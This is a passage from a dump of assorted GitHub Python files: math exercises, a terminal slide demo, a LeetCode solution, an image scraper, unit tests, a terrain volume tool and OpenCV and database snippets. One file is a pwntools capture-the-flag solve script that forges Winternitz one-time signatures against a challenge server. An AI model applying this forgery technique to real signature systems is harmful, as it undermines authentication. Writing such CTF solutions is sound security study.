>= 2\r\n    Return the list of prime numbers up to n\"\"\"\r\n    # keep only the integers with no divisor between 2 and themselves\r\n    return [i for i in range(2, n+1) if all(i % d != 0 for d in range(2, i))]\r\n\r\nprint(liste_nombres_premiers(10))\r\nassert liste_nombres_premiers(10) == [2, 3, 5, 7]\r\nassert liste_nombres_premiers(30) == [2, 3, 5, 7, 11, 13, 17, 19, 23, 29]\r\nassert liste_nombres_premiers(2) == [2]\r\n\r\n\r\ndef liste_facteurs_premiers(n: int) -> List[int]:\r\n    \"\"\"Precondition: n >= 2\r\n    Return the list corresponding to the prime factorization of n\"\"\"\r\n    nb_premiers: List[int] = liste_nombres_premiers(n)\r\n    res: List[int] = []\r\n    n_copy: int = n\r\n    i: int\r\n    for i in nb_premiers:\r\n        while n_copy%i == 0 and n_copy != 1:\r\n            res.append(i)\r\n            n_copy = n_copy//i\r\n    return res\r\n    \r\nassert liste_facteurs_premiers(30) == [2, 3, 5]\r\nassert liste_facteurs_premiers(56) == [2, 2, 2, 7]\r\nassert liste_facteurs_premiers(1024) == [2, 2, 2, 2, 2, 2, 2, 2, 2, 2]\r\nassert liste_facteurs_premiers(13) == [13]\r\n\r\ndef decomposition_facteurs_premiers(n: int) -> Dict[int, int]:\r\n    \"\"\"Precondition: n >= 2\r\n    Return the dictionary corresponding to the prime factorization of n\"\"\"\r\n    return decomposition(liste_facteurs_premiers(n))\r\n\r\nassert decomposition_facteurs_premiers(1024) == {2: 10}\r\nassert decomposition_facteurs_premiers(30) == {2: 1, 3: 1, 5: 1}\r\nassert decomposition_facteurs_premiers(56) == {2: 3, 7: 1}\r\nassert decomposition_facteurs_premiers(13) == {13: 1}\r\n","repo_name":"LU1IN001/S1_TME-TD","sub_path":"TP8/Wilhem_Blondel_Axel_Danappe-Laclef_Ex9-7.py","file_name":"Wilhem_Blondel_Axel_Danappe-Laclef_Ex9-7.py","file_ext":"py","file_size_in_byte":2410,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"37618337953","text":"from asciimatics.screen import Screen\nfrom frame import Frame # object representing a frame\nfrom animations import * # animation functions\nfrom time import time, sleep\n\n\n\ndef run_animation(screen, anim, post_delay: int = 0):\n    fr = Frame(screen)\n    for changes in anim:\n        prev_frame_time = time()\n        for change in changes:\n            fr = change(fr)\n            key = screen.get_key()\n            if key == ord('n'):\n                fr.clear()\n                return \"next\"\n            if key == ord('p'):\n                return \"previous\"\n            if key == ord('r'):\n                return \"restart\"\n            if key == ord('q'):\n                exit(0)\n            fr.show(screen)\n            while time() - prev_frame_time < 0.01:\n                pass\n        sleep(post_delay/100)\n    return \"finished\"\n\n\ndef run_presentation(screen, presentation: list):\n    \"\"\"Run the given presentation in the given screen.\n    A presentation is simply a list of animations, one for each slide.\"\"\"\n    fr = Frame(screen)\n    slide_idx = 0\n    while slide_idx < len(presentation):\n        ##### Here, play the animation #####\n        for slide_modification in presentation[slide_idx]:\n            prev_frame_time = time()\n            for modif in slide_modification:\n                fr = modif(fr)\n            key = screen.get_key()\n            if key == ord('n'): # next\n                slide_idx += 1\n                break\n            if key == ord('p'): # previous\n                print(\"\\a\")\n                slide_idx -= 1\n                break\n            if key == ord('r'): # restart\n                continue\n            if key == ord('q'): # quit\n                exit(0)\n            fr.show()\n            while time() - prev_frame_time < 0.01:\n                pass\n        # a pause\n        # key = screen.get_key()\n        while key == screen.get_key():\n            if key == ord('n'): # next\n                slide_idx += 1\n                continue\n            elif key == ord('p'): # previous\n                print('\\a')\n                slide_idx -= 1\n                continue\n            elif key == ord('r'): # restart\n                continue\n            elif key == ord('q'): # quit\n                exit(0)\n        fr.clear()\n        slide_idx += 1\n\n\ndef presentation(screen):\n    a = PrimitiveAnimations(screen)\n    present = [\n\n        a.one_by_one(\n            a.title(\"slide 1\"),\n            a.appear(4, \"this library is useful for making presentations\"),\n            a.appear(6, \"more precisely, text-based presentations\"),\n            a.appear(8, \"Here is a little demonstration of what it can do\"),\n            # pauses=True\n        ),\n\n        a.one_by_one(\n            a.title(\"slide 2\"),\n            a.appear(2, \"you\"),\n            a.appear(3, \"can\"),\n            a.appear(4, \"make\"),\n            a.appear(5, \"things\"),\n            a.appear(6, \"appear\"),\n        ),\n\n        a.one_by_one(\n            a.title(\"slide 3\"),\n            a.appear(2, \"these\"),\n            a.appear(3, \"ones\"),\n            a.appear(4, \"are\"),\n            
a.appear(5, \"slower\"),\n delay=20,\n ),\n\n a.concat(\n a.title(\"slide 3\"),\n a.appear(2, \"animations are very powerful\"),\n a.after(100, a.appear_left(4, \"-> here it comes\", delay=3)),\n a.bulleted(6, 5, \"and\"),\n a.bulleted(7, 5, \"we\"),\n a.bulleted(8, 5, \"have\"),\n a.bulleted(9, 5, \"bullet\"),\n a.bulleted(10, 5, \"lists\"),\n ),\n\n ]\n run_presentation(screen, present)\n # for a in present:\n # run_animation(screen, a, 100)\n # run_animation(screen, present[0], 100)\n\n\nScreen.wrapper(presentation)\n\n","repo_name":"OsKaR31415/presentation","sub_path":"present.py","file_name":"present.py","file_ext":"py","file_size_in_byte":3745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"3123461892","text":"class Solution(object): \n def canIWin(self, maxChoosableInteger, desiredTotal):\n \"\"\"\n :type maxChoosableInteger: int\n :type desiredTotal: int\n :rtype: bool\n \"\"\"\n def win(M, T, m, state):\n #The other player already win, so T is smaller or equal to 0\n if T <= 0: \n return False\n #The repeated situation, check the result at m\n if m[state] != 0:\n return m[state] == 1\n for i in range(M):\n #number i used\n if (state & (1 << i)) > 0:\n continue\n #The other player can't win, so you win\n if not win(M, T-i-1, m, state | (1 << i)):\n m[state] = 1\n return True\n #At the end, you can't win\n m[state] = -1\n return False\n \n #The sum of all numbers < target value, no one can win\n if (maxChoosableInteger * (maxChoosableInteger + 1)) / 2 < desiredTotal:\n return False\n #This player win\n if desiredTotal <= 0:\n return True\n if (maxChoosableInteger * (maxChoosableInteger + 1)) / 2 == desiredTotal:\n return maxChoosableInteger % 2 == 1\n m = [0] * (1 << maxChoosableInteger) #0 for unknown, 1 for win, -1 for lose\n return win(maxChoosableInteger, desiredTotal, m, 0)\n","repo_name":"tr1503/LeetCode","sub_path":"MinMax/canIWin.py","file_name":"canIWin.py","file_ext":"py","file_size_in_byte":1419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"4030137067","text":"size_font = 70\nsize_xo = 80\n\nbg_color = '#D0CFE1' # white\ngeometry = '600x600'\n\ninstr_text = 'X - you O - bot'\n\nframe1_color = '#9765E1' # purple\n\nframe2_color = '#C1A8E1' # soft purple\n\ndraw = 'Draw'\nplayer_win = 'You win!' 
\nbot_win = 'Bot win...'","repo_name":"FelixKerser/tic-tac-toe-AI","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"4932618620","text":"#!/usr/bin/python3\n\nfrom pwn import *\nimport winternitz.signatures\nfrom binascii import unhexlify\n\nHOST = \"winterfactory-0.chals.kitctf.de\"\nPORT = 1337\n\nLOCAL = not args.REMOTE\n\nfactory_id = 831347528\ninit_message = bytes(\"surely no secret here\"+str(factory_id), \"utf-8\")\nw = 2**16\n\nlocal_wots = winternitz.signatures.WOTS(w, digestsize=256, hashfunction=winternitz.signatures.openssl_sha256)\n\ninit_msghash = winternitz.signatures.openssl_sha256(init_message)\ninit_bytestosign = local_wots._getSignatureBaseMessage(init_msghash)\n\nlowest_ck = init_bytestosign[16]\n\n\n#context.log_level = \"DEBUG\"\n\nif LOCAL:\n p = process([\"python3\", \"winterfactory.py\"])\nelse:\n p = remote(HOST, PORT, ssl=True)\n\n\ndef can_sign(mb):\n for i in range(16):\n if mb[i] < init_bytestosign[i]:\n return False\n if mb[17] < init_bytestosign[i]:\n return False\n \"\"\"\n if mb[16] < lowest_ck:\n return False\n \"\"\"\n return True\n\ndef signature(mb):\n certif = [None for _ in range(18)]\n for i in range(16):\n certif[i] = local_wots._chain(init_certificate[i], init_bytestosign[i], mb[i])\n certif[17] = local_wots._chain(init_certificate[17], init_bytestosign[17], mb[17])\n certif[16] = local_wots._chain(lowest_ck_sign, lowest_ck, mb[16])\n return \"|\".join([b.hex() for b in certif]).encode()\n\np.recvline()\np.recvline()\ninit_certificate = list(map(unhexlify, p.recvline(keepends=False).decode().split(\"|\")))\nlowest_ck_sign = init_certificate[16]\np.recvline()\np.recvline()\n\nwhile True:\n p.recvline()\n p.recvline()\n p.recvuntil(b\"| \")\n p11 = unhexlify(p.recvuntil(b\" |\", drop=True).decode())\n p.recvline()\n p.recvline()\n p.recvuntil(b\"| \")\n p21 = unhexlify(p.recvuntil(b\" |\", drop=True).decode())\n p.recvuntil(b\">> \")\n p11_hash = winternitz.signatures.openssl_sha256(p11)\n p21_hash = winternitz.signatures.openssl_sha256(p21)\n p11_bytes = local_wots._getSignatureBaseMessage(p11_hash)\n p21_bytes = local_wots._getSignatureBaseMessage(p21_hash)\n if (can_sign(p11_bytes) and p11_bytes[16] >= p21_bytes[16]) or (can_sign(p21_bytes) and p21_bytes[16] >= p11_bytes[16]):\n p.sendline(b\"yes\")\n p.recvuntil(b\">> \")\n if p11_bytes[16] >= p21_bytes[16]:\n p.sendline(b\"2\")\n p.recvline()\n ck_sign = unhexlify(p.recvline(keepends=False).decode())\n lowest_ck = p21_bytes[16]\n lowest_ck_sign = ck_sign\n p.recvuntil(b\">> \")\n p.sendline(signature(p11_bytes))\n else:\n p.sendline(b\"1\")\n p.recvline()\n ck_sign = unhexlify(p.recvline(keepends=False).decode())\n lowest_ck = p11_bytes[16]\n lowest_ck_sign = ck_sign\n p.recvuntil(b\">> \")\n p.sendline(signature(p21_bytes))\n print(p.recvline(keepends=False))\n exit()\n else:\n p.sendline(b\"no\")\n\n","repo_name":"MathVerg/WriteUp","sub_path":"GPN2023/winterfactory/attack.py","file_name":"attack.py","file_ext":"py","file_size_in_byte":2896,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"73695930969","text":"import requests\nfrom bs4 import BeautifulSoup\nimport os\n\ntitle= '王者'\nos.mkdir(title)\nheaders = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36'}\nfor i in range(2, 50):\n list_url = 
'http://www.netbian.com/s/wangzherongyao/index_'+str(i)+'.htm'\n    list_source = requests.get(list_url, headers=headers).text\n    list_soup = BeautifulSoup(list_source, 'lxml')\n    page_urls = list_soup.find('div', {'class': 'list'}).find_all('li')\n    for j in page_urls:\n        second_url = 'http://www.netbian.com'+j.find('a')['href']\n        try:\n            second_source = requests.get(second_url, headers=headers).text\n        except:\n            continue  # skip this page instead of reading an undefined variable below\n        second_soup = BeautifulSoup(second_source, 'lxml')\n        second_page_urls = second_soup.find('div', {'class': 'pic'}).find_all('p')\n        for each in second_page_urls:\n            third_url = 'http://www.netbian.com'+each.find('a')['href']\n            # print(third_url)\n            third_request = requests.get(third_url,headers = headers)\n            third_pagesource = third_request.text\n            third_soup = BeautifulSoup(third_pagesource,'lxml')\n            img_name = third_soup.find('title').text\n            # print(img_name)\n            try:\n                img_source = third_soup.find('table', {'id': 'endimg'}).find_all('img') # find the image tags\n            except:\n                continue  # skip pages without the expected image table\n            # print(img_source)\n            for img in img_source:\n                url = img['src']\n                print(url)\n                img_data = requests.get(url, headers=headers).content\n                f = open(title+'\\\\'+img_name + '.jpg', 'wb')\n                f.write(img_data)\n                f.close()\n\n\n\n\n","repo_name":"xiaohuiduan/python_samll_project","sub_path":"picture.py","file_name":"picture.py","file_ext":"py","file_size_in_byte":1755,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"31"} +{"seq_id":"41772787485","text":"# python -m unittest test\n# python -m unittest -v test\n# python -m unittest discover\n# python -m unittest discover -s tests // run tests in the \"tests\" folder\n# python -m unittest discover -s tests -t src // also specify source location\n# coverage run -m unittest discover\n# coverage report\n# coverage html\n# coverage-lcov\nfrom fractions import Fraction\nimport unittest\n\nfrom my_sum import sum\n\nclass TestSum(unittest.TestCase):\n    def test_list_int(self):\n        \"\"\"\n        Test that it can sum a list of integers\n        \"\"\"\n        data = [1, 2, 3]\n        result = sum(data)\n        self.assertEqual(result, 6)\n\n    def test_list_fraction(self):\n        \"\"\"\n        Test that it can sum a list of fractions\n        \"\"\"\n        data = [Fraction(1, 4), Fraction(1, 4), Fraction(2, 5)]\n        result = sum(data)\n        self.assertEqual(result, 1)\n    \n    def test_bad_type(self):\n        data = \"banana\"\n        with self.assertRaises(TypeError):\n            result = sum(data)\n\nif __name__ == '__main__':\n    unittest.main()","repo_name":"thimotyb/python-testing","sub_path":"project/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"30634234458","text":"import datetime\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nimport tkinter as tk\nfrom tkinter import filedialog\n\nvolume_list = []\nlevel_list = []\n\nbefore_time = datetime.datetime.now()\n\nprint(\"Importing text file\")\nprint(\"____________________________________\")\n\nroot = tk.Tk()\nroot.withdraw()\n\nfilename = filedialog.askopenfilename(title=\"Select point text file\")\n\ntry:\n    df = np.genfromtxt(filename, delimiter=\" \")\n    num_cols = df.shape[1]\nexcept:\n    try:\n        df = np.genfromtxt(filename, delimiter=\",\")\n        num_cols = df.shape[1]\n    except:\n        try:\n            df = np.genfromtxt(filename, delimiter=\"\\t\")\n            num_cols = df.shape[1]\n        except:\n            print(\"Not Uploaded\")\n            raise SystemExit\n\n\nprint(\"Uploaded successfully\")\n\nif num_cols == 3:\n    x, y, z = df[:, 0], df[:, 1], df[:, 2]\nelif num_cols == 4:\n    x, y, z = 
df[:, 1], df[:, 2], df[:, 3]\nelse:\n    raise ValueError(f\"There are {num_cols} columns in point text data. Should have 3 or 4 columns\")\n\nprint(\"____________________________________\")\n\n# int() already raises ValueError on non-numeric input, so no extra type checks are needed\nS = int(input(\"Enter fixed distance between points: \"))\nprint(\"____________________________________\")\n\nprint(\"For the water volume calculation below a certain level;\")\nprint(\"Two height levels will be required. Water volumes will be calculated for all intermediate levels at 1 meter intervals!\")\nprint(\"____________________________________\")\n\nmax_level = int(input(\"Enter a height level: \")) + 1\nmin_level = int(input(\"Now enter a lower height level: \"))\n\nprint(\"____________________________________\")\n\nif min_level > max_level:\n    raise Exception(\"You must enter the second value lower\")\n\nsave_dir = filedialog.askdirectory(title=\"Select the folder to save\")\nfor height in range(min_level, max_level):\n    # Point filter according to input level\n    level_list.append(height)\n    filtered_points = df[z < height]\n\n    n = len(filtered_points)\n\n    # Volume Calculations\n    if num_cols == 3:\n        f = height - np.mean(filtered_points[:, 2])\n    elif num_cols == 4:\n        f = height - np.mean(filtered_points[:, 3])\n    area = (((np.sqrt(n) - 1) * S) ** 2)\n    volume = area * f\n    volume_list.append(volume)\n\n    # Graph points\n    fig, ax = plt.subplots(figsize=(8, 6))\n    if num_cols == 3:\n        ax.scatter(df[:, 0], df[:, 1], c='grey', alpha=0.2)\n        scatter = ax.scatter(filtered_points[:, 0], filtered_points[:, 1], c=filtered_points[:, 2], cmap='viridis', s=1)\n    elif num_cols == 4:\n        ax.scatter(df[:, 1], df[:, 2], c='grey', alpha=0.2)\n        scatter = ax.scatter(filtered_points[:, 1], filtered_points[:, 2], c=filtered_points[:, 3], cmap='viridis', s=1)\n    ax.set_xlabel('Y')\n    ax.set_ylabel('X')\n    ax.set_title(f'Z={height}. LEVEL')\n\n    filename = \"{}.jpeg\".format(height)\n    print(f\"{filename} is drawn and the calculations are saved to the text file\")\n    plt.colorbar(scatter, ax=ax)\n    resolution_value = 300\n    plt.savefig(f\"{save_dir}/{filename}\", dpi=resolution_value)\n\n    with open(f\"{save_dir}/RESULTS.txt\", \"a\") as dosya:\n        dosya.write(\"_______________________\\n\")\n        dosya.write(f\"Height: {height}\\n\")\n        dosya.write(\"***********\\n\")\n        dosya.write(f\"Number of points below level {height}: {n}\\n\")\n        dosya.write(f\"Difference of Z-means from {height}. 
level: {f:.2f}\\n\")\n        dosya.write(\"Area: {:,.2f} m2\\n\".format(area))\n        dosya.write(\"Volume: {:,.2f} m3\\n\".format(volume))\n\nsecond = (datetime.datetime.now() - before_time).total_seconds()\n\nwith open(f\"{save_dir}/RESULTS.txt\", \"a\") as file:\n    file.write(\"_______________________\\n\\n\")\n    file.write(f\"Total process time: {second:.0f} seconds\\n\")\n    file.write(\"_______________________\\n\\n\")\n\n# the with-block above already closed the file\n\nplt.clf()\nx = level_list\ny = []\nfor vol in volume_list:\n    y.append(vol/1000000)\n\nyy = min(y) / 3\n\nplt.bar(x, y)\nplt.xticks(x)\nplt.yticks(y)\nplt.ylim(bottom=yy)\nplt.ylabel('Volume (million m3)')\nplt.xlabel('Water Height Levels (m)')\nplt.title('Water Volume Graph')\nplt.savefig(f\"{save_dir}/{min_level}_{max_level-1}.jpeg\")\n","repo_name":"ogokdas/topography","sub_path":"topography.py","file_name":"topography.py","file_ext":"py","file_size_in_byte":4240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"40842163076","text":"# Exercise 2: Arithmetic with loops\ntall = int(input(\"enter a number: \"))\nnum = []\nminSum = 0\n\nwhile tall != 0:\n    num.append(tall)\n    tall = int(input(\"enter a number: \"))\n\nfor x in range(0, len(num)):\n    minSum += num[x]\n\nprint(minSum)\n\n# find the largest\nstorste = num[0]\nfor x in num:\n    if storste < x:\n        storste = x\nprint(storste)\n\n# find the smallest\nminste = num[0]\nfor x in num:\n    if minste > x:\n        minste = x\nprint(minste)\n","repo_name":"yastaheran/Litt-Paa-Sia","sub_path":"Python/Oblig-IN1000/Oblig4/regnelokke.py","file_name":"regnelokke.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"940029156","text":"# Importing necessary packages\nimport argparse\nimport cv2\nimport numpy as np\nimport random\n\nap = argparse.ArgumentParser()\n\n# Command line arguments\nap.add_argument(\"-i\", \"--image\", type=str, default=\"Quicksilver.jpg\",\n\thelp=\"path to the input image\")\n\t\nap.add_argument(\"-e\",\"--endpoints\",type=str,default=\"3\")\nap.add_argument(\"-sp\",\"--speed\",type=str,default=\"1\")\nap.add_argument(\"-th\",\"--thickness\",type=str,default=\"1\")\n\nargs = vars(ap.parse_args())\n\n# Find dimensions of image\nimage = cv2.imread(args[\"image\"])\n(h, w) = image.shape[:2]\n\n# Converting user inputs into variables\nendpoints = int(args[\"endpoints\"])\nspeed = int(args[\"speed\"])\nthickness = int(args[\"thickness\"])\n\n# Defining two empty lists\npointsX0 = []\npointsY0 = []\n\n# This function will append the coordinates into a list for the shape\ndef point_arrays(endpoints, speed):\n\tif endpoints == 3:\n\t\tarrI = np.array([[pointsX[-3]+speed,pointsY[-3]+speed],[pointsX[-2]+speed,pointsY[-2]+speed],[pointsX[-1]+speed,pointsY[-1]+speed]])\n\t\treturn arrI\n\telif endpoints == 4:\n\t\tarrI = np.array([[pointsX[-4]+speed,pointsY[-4]+speed],[pointsX[-3]+speed,pointsY[-3]+speed],[pointsX[-2]+speed,pointsY[-2]+speed],[pointsX[-1]+speed,pointsY[-1]+speed]])\n\t\treturn arrI\n\n# Generates a random color\ndef random_color():\n\t# randint is inclusive on both ends, so 255 is the valid channel maximum\n\tblue_intensity = random.randint(0,255)\n\tgreen_intensity = random.randint(0,255)\n\tred_intensity = random.randint(0,255)\n\n\tgenerated_color = (blue_intensity, green_intensity, red_intensity)\n\t\n\treturn generated_color\n\n# The movement portion only applies for the triangle\n\n# Decide which vertex of the triangle is touching which edge of the picture to inform future movements\ndef tri_decide(arrIII):\n\n\tvIV = w - speed\n\tvV 
= h - speed\n\tvVI = speed\n\tif arrIII[0,0] >= vIV:\n\t\treturn 0\n\telif arrIII[0,0] <= vVI:\n\t\treturn 1\n\telif arrIII[1,0] >= vIV:\n\t\treturn 2\n\telif arrIII[1,0] <= vVI:\n\t\treturn 3\n\telif arrIII[2,0] >= vIV:\n\t\treturn 4\n\telif arrIII[2,0] <= vVI:\n\t\treturn 5\n\telif arrIII[0,1] >= vV:\n\t\treturn 6\n\telif arrIII[0,1] <= vVI:\n\t\treturn 7\n\telif arrIII[1,1] >= vV:\n\t\treturn 8\n\telif arrIII[1,1] <= vVI:\n\t\treturn 9\n\telif arrIII[2,1] >= vV:\n\t\treturn 10\n\telif arrIII[2,1] <= vVI:\n\t\treturn 11\n\n# This function initializes the triangle location\ndef tri_initialize(arrIII):\n\n\tvIV = w - speed\n\tvV = h - speed\n\tvVI = speed\n\tif arrIII[0,0] >= vIV:\n\t\tadd = vIV - arrIII[0,0]\n\t\tarrIII[0,0] += add\n\t\tarrIII[1,0] += add\n\t\tarrIII[2,0] += add\n\t\treturn arrIII\n\telif arrIII[0,0] <= vVI:\n\t\tadd = vVI - arrIII[0,0]\n\t\tarrIII[0,0] += add\n\t\tarrIII[1,0] += add\n\t\tarrIII[2,0] += add\n\t\treturn arrIII\n\telif arrIII[1,0] >= vIV:\n\t\tadd = vIV - arrIII[1,0]\n\t\tarrIII[0,0] += add\n\t\tarrIII[1,0] += add\n\t\tarrIII[2,0] += add\n\t\treturn arrIII\n\telif arrIII[1,0] <= vVI:\n\t\tadd = vVI - arrIII[1,0]\n\t\tarrIII[0,0] += add\n\t\tarrIII[1,0] += add\n\t\tarrIII[2,0] += add\n\t\treturn arrIII\n\telif arrIII[2,0] >= vIV:\n\t\tadd = vIV - arrIII[2,0]\n\t\tarrIII[0,0] += add\n\t\tarrIII[1,0] += add\n\t\tarrIII[2,0] += add\n\t\treturn arrIII\n\telif arrIII[2,0] <= vVI:\n\t\tadd = vVI - arrIII[2,0]\n\t\tarrIII[0,0] += add\n\t\tarrIII[1,0] += add\n\t\tarrIII[2,0] += add\n\t\treturn arrIII\n\telif arrIII[0,1] >= vV:\n\t\tadd = vV - arrIII[0,1]\n\t\tarrIII[0,1] += add\n\t\tarrIII[1,1] += add\n\t\tarrIII[2,1] += add\n\t\treturn arrIII\n\telif arrIII[0,1] <= vVI:\n\t\tadd = vVI - arrIII[0,1]\n\t\tarrIII[0,1] += add\n\t\tarrIII[1,1] += add\n\t\tarrIII[2,1] += add\n\t\treturn arrIII\n\telif arrIII[1,1] >= vV:\n\t\tadd = vV - arrIII[1,1]\n\t\tarrIII[0,1] += add\n\t\tarrIII[1,1] += add\n\t\tarrIII[2,1] += add\n\t\treturn arrIII\n\telif arrIII[1,1] <= vVI:\n\t\tadd = vVI - arrIII[1,1]\n\t\tarrIII[0,1] += add\n\t\tarrIII[1,1] += add\n\t\tarrIII[2,1] += add\n\t\treturn arrIII\n\telif arrIII[2,1] >= vV:\n\t\tadd = vV - arrIII[2,1]\n\t\tarrIII[0,1] += add\n\t\tarrIII[1,1] += add\n\t\tarrIII[2,1] += add\n\t\treturn arrIII\n\telif arrIII[2,1] <= vVI:\n\t\tadd = vVI - arrIII[2,1]\n\t\tarrIII[0,1] += add\n\t\tarrIII[1,1] += add\n\t\tarrIII[2,1] += add\n\t\treturn arrIII\n\na = 0\nb = 0\nc = 0\n\npointsX = pointsX0.copy()\npointsY = pointsY0.copy()\n\n# This randomly generates the coordinates of the shape\nfor a in range(0, endpoints):\n\trX = random.randint(0, w-1)\n\tpointsX.append(rX)\nfor b in range(0, endpoints):\n\trY = random.randint(0, h-1)\n\tpointsY.append(rY)\n\nlowest_point_Y = max(pointsY)\ndistanceI = h - lowest_point_Y\n\nright_point_X = max(pointsX)\ndistanceII = w - right_point_X\n\n# This function is used to move the triangle from its original location and set up the movement with the rest of the program\ndef original_move():\n\tglobal c\n\tglobal distanceI\n\tglobal distanceII\n\tglobal thickness\n\t\t\n\twhile c < distanceI and c < distanceII:\n\t\tglobal arrIII\n\t\timageI = image.copy()\n\t\tarrII = point_arrays(endpoints, c)\n\t\tarrIII = arrII.copy()\n\t\tfinal_image = cv2.polylines(imageI,[arrIII],True,random_color(),thickness)\n\n\t\tcv2.imshow(\"Modified_Image\",final_image)\n\t\tcv2.waitKey(2)\n\t\tc += speed\n\t\tglobal arrIV\n\t\tarrIV = arrIII.copy()\n\treturn arrIV\n\t\t\narrV = original_move()\n\n# Makes the triangle bounce around the 
\n# This function rigidly shifts the triangle so the out-of-bounds vertex sits exactly on the border\ndef tri_initialize(arrIII):\n\n\tvIV = w - speed\n\tvV = h - speed\n\tvVI = speed\n\t# Same scan order as tri_decide: x-coordinates of vertices 0-2 against the\n\t# right/left borders, then y-coordinates against the bottom/top borders.\n\tfor axis, far_edge in ((0, vIV), (1, vV)):\n\t\tfor vertex in range(3):\n\t\t\tif arrIII[vertex, axis] >= far_edge:\n\t\t\t\tarrIII[:, axis] += far_edge - arrIII[vertex, axis]\n\t\t\t\treturn arrIII\n\t\t\tif arrIII[vertex, axis] <= vVI:\n\t\t\t\tarrIII[:, axis] += vVI - arrIII[vertex, axis]\n\t\t\t\treturn arrIII\n\na = 0\nb = 0\nc = 0\n\npointsX = pointsX0.copy()\npointsY = pointsY0.copy()\n\n# This randomly generates the coordinates of the shape\nfor a in range(0, endpoints):\n\trX = random.randint(0, w-1)\n\tpointsX.append(rX)\nfor b in range(0, endpoints):\n\trY = random.randint(0, h-1)\n\tpointsY.append(rY)\n\nlowest_point_Y = max(pointsY)\ndistanceI = h - lowest_point_Y\n\nright_point_X = max(pointsX)\ndistanceII = w - right_point_X\n\n# This function is used to move the triangle from its original location and set up the movement with the rest of the program\ndef original_move():\n\tglobal c\n\tglobal distanceI\n\tglobal distanceII\n\tglobal thickness\n\t\t\n\twhile c < distanceI and c < distanceII:\n\t\tglobal arrIII\n\t\timageI = image.copy()\n\t\tarrII = point_arrays(endpoints, c)\n\t\tarrIII = arrII.copy()\n\t\tfinal_image = cv2.polylines(imageI,[arrIII],True,random_color(),thickness)\n\n\t\tcv2.imshow(\"Modified_Image\",final_image)\n\t\tcv2.waitKey(2)\n\t\tc += speed\n\t\tglobal arrIV\n\t\tarrIV = arrIII.copy()\n\treturn arrIV\n\t\t\narrV = original_move()\n\n# Makes the triangle bounce around the edges of the image\nif endpoints == 3:\n\twhile True:\n\n\t\td = tri_decide(arrV)\n\t\tarrIII = tri_initialize(arrV)\n\t\tr = random.randint(0,1)\n\n\t\tvI = w + speed\n\t\tvII = h + speed\n\t\tvIII = speed\n\t\tthickness += 1\n\n\t\t# Keep stepping while every vertex is still inside the (slightly padded) frame.\n\t\twhile (arrV[:, 0].min() >= vIII and arrV[:, 0].max() <= vI\n\t\t\t\tand arrV[:, 1].min() >= vIII and arrV[:, 1].max() <= vII):\n\n\t\t\timageII = image.copy()\n\n\t\t\t# Choose the step away from the border that was hit (see tri_decide codes);\n\t\t\t# the component parallel to that border is picked at random.\n\t\t\tif d in (0, 2, 4):      # right border: move left\n\t\t\t\tdx, dy = -speed, -speed if r == 0 else speed\n\t\t\telif d in (1, 3, 5):    # left border: move right\n\t\t\t\tdx, dy = speed, speed if r == 0 else -speed\n\t\t\telif d in (6, 8, 10):   # bottom border: move up\n\t\t\t\tdx, dy = speed if r == 0 else -speed, -speed\n\t\t\telif d in (7, 9, 11):   # top border: move down\n\t\t\t\tdx, dy = -speed if r == 0 else speed, speed\n\t\t\telse:                   # no border contact detected: re-run tri_decide (avoids a busy loop)\n\t\t\t\tbreak\n\n\t\t\tarrIII[:, 0] += dx\n\t\t\tarrIII[:, 1] += dy\n\n\t\t\tfinal_image = cv2.polylines(imageII,[arrIII],True,random_color(),thickness)\n\t\t\tcv2.imshow(\"Modified_Image\",final_image)\n\t\t\tcv2.waitKey(2)\n\n# This program was Generating_Shapes_SV_XXXII.py by SarvasyaVikas\n","repo_name":"SarvasyaVikas/Image-Manipulation","sub_path":"Generating_Shapes_SV.py","file_name":"Generating_Shapes_SV.py","file_ext":"py","file_size_in_byte":7314,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"15371970616","text":"import psycopg2\nfrom bd import conn\n\n#def update_zone_occupation(zone_id, zone_people_inside):\n'''Update the person_mac entries that are currently inside the zone'''\n\n\ntry:\n    with conn.cursor() as cur:\n        # In this case we do not need to clean up any data\n        cur.execute(\"SELECT id, zone_name, zone_people_inside FROM bfz_zone;\")\n        # print('There are {} people in the zone'.format(zone_people_inside))\n\n        # fetchall returns every row of the result set\n        bfz_data = cur.fetchall()\n\n        # Iterate and print\n        for bfz in bfz_data:\n            print(bfz)\n        \n        esp32_status = 1\n\n        update_position = \"UPDATE bfz_zone SET zone_people_inside = 7 WHERE id = 1;\"\n        #zone_people_inside = 1\n        #cur.execute(update_position, (zone_people_inside))\n
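        # Parameterized form (sketch): let psycopg2 substitute %s placeholders rather\n        # than baking values into the SQL string:\n        # cur.execute(\"UPDATE bfz_zone SET zone_people_inside = %s WHERE id = %s;\", (7, 1))\n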
